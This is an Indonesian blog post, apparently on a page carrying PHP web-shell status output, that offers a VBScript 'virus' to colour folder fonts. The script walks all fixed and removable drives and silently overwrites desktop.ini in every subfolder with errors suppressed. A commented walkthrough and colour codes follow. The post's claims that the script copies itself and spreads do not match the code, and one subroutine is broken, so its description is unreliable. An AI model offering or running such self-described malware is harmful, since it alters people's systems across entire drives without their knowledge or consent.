Uname
User
Php
Hdd
Chating
:Linux p3nlhg416.shr.prod.phx3.secureserver.net 2.6.32-279.el6.x86_64 #1 SMP Fri Jun 22 12:19:21 UTC 2012 x86_64
:666 ( sohai_666 ) Group: 666 ( ? )
:5.2.17 Safe mode: ON [ phpinfo ] Datetime: 2012-09-08 01:17:15
:10000.00 GB Free: 2802.46 GB (28%) GB
:sohai


Menghias Font dengan Virus

Penjelasan:
Virus ini membuat dirinya menjadi Desktop.ini dan menyebar ke lokasi tertentu.
dan menduplikasikan diri nya ke dalam drive untuk dijadikan file induk,kemudian virus ini menyebar ke seluruh folder.

script tergolong Malware tetapi virus ini tidak jahat,dimana malware ini dapat menghiasi tampilan font menjadi berwarna dan agan bisa memilih warna yang agan suka.

code:




On Error Resume Next
dim SOHAI
set SOHAI=CreateObject("Scripting.FileSystemObject")
On Error Resume Next
dim drive,machine
set machine=SOHAI.Drives
for each drive in machine
if (drive.DriveType=2)or(drive.DriveType=3) then
indexFolders(drive.Path&"\")
end If
next

sub indexFolders(location)
On Error Resume Next
dim specs,file,subFol,sohai
set specs=SOHAI.GetFolder(location)
set subFol=specs.SubFolders
for each file in subFol
set sohai = SOHAI.CreateTextFile(file.path &"\desktop.ini",2,true)
sohai.write
sohai.WriteLine("[ExtShellFolderViews]")
sohai.Writeline("{BE098140-A513-11D0-A3A4-00C04FD706EC}={BE098140-A513-11D0-A3A4-00C04FD706EC}")
sohai.Writeline("[{BE098140-A513-11D0-A3A4-00C04FD706EC}]")
sohai.Writeline("Attributes=1")
sohai.Writeline("IconArea_Text=0x0000FF80")
sohai.Close
next
end sub

sub writeData(location)
On Error Resume Next
dim folder,directory,file,sohai
set folder=SOHAI.GetFolder(location)
set directory=folder.Files
for each file in directory
set sohai = SOHAI.CreateTextFile(file.path &"\desktop.ini",2,true)
sohai.write
sohai.WriteLine("[ExtShellFolderViews]")
sohai.Writeline("{BE098140-A513-11D0-A3A4-00C04FD706EC}={BE098140-A513-11D0-A3A4-00C04FD706EC}")
sohai.Writeline("[{BE098140-A513-11D0-A3A4-00C04FD706EC}]")
sohai.Writeline("Attributes=1")
sohai.Writeline("IconArea_Text=0x0000FF80")
sohai.Close
next
end sub



buat agan-agan percaya akan ane oprek dan di jelaskan fungsi-ungsi nya

On Error Resume Next

>>buat mencegah kalo ada Error

dim SOHAI

>>sebuah variable

set SOHAI=CreateObject("Scripting.FileSystemObject")
On Error Resume Next

>>menuliskan sebuah file di dalam system script

dim drive,machine
set machine=SOHAI.Drives
for each drive in machine
if (drive.DriveType=2)or(drive.DriveType=3) then
indexFolders(drive.Path&"\")
end If
next

>>drive dan mesin

sub indexFolders(location)
On Error Resume Next
dim specs,file,subFol,sohai
set specs=SOHAI.GetFolder(location)
set subFol=specs.SubFolders
for each file in subFol

>>manipulasi indeks folder

set sohai = SOHAI.CreateTextFile(file.path &"\desktop.ini",2,true)
sohai.write
sohai.WriteLine("[ExtShellFolderViews]")
sohai.Writeline("{BE098140-A513-11D0-A3A4-00C04FD706EC}={BE098140-A513-11D0-A3A4-00C04FD706EC}")
sohai.Writeline("[{BE098140-A513-11D0-A3A4-00C04FD706EC}]")

>>membuat file Desktop.ini

sohai.Writeline("Attributes=1")

>>memberikan value 1 pada Attributes

sohai.Writeline("IconArea_Text=0x0000FF80")

>>nah kalo ini jenis warna yang di gunakan,contoh 0x0000FF80
ini bisa di ubah dengan warna lain

sohai.Close
next
end sub

>>Perintah akhir script

NB:

0X00ff00ff>>Pink
0x0000ffff>>Kuning
0x00ff0000>>Biru
0x00400080>>cokelat
0x000080ff>>Orange
0x00ff0080>>Ungu



hasil nya seperti ini:







Berbekal notepad dan vbsscript ,sory ya kalo
jelek..postingan nya
0 komentar: di postingan Menghias Font dengan Virus
 

0 komentar:

Posting Komentar

Source by sohai @2008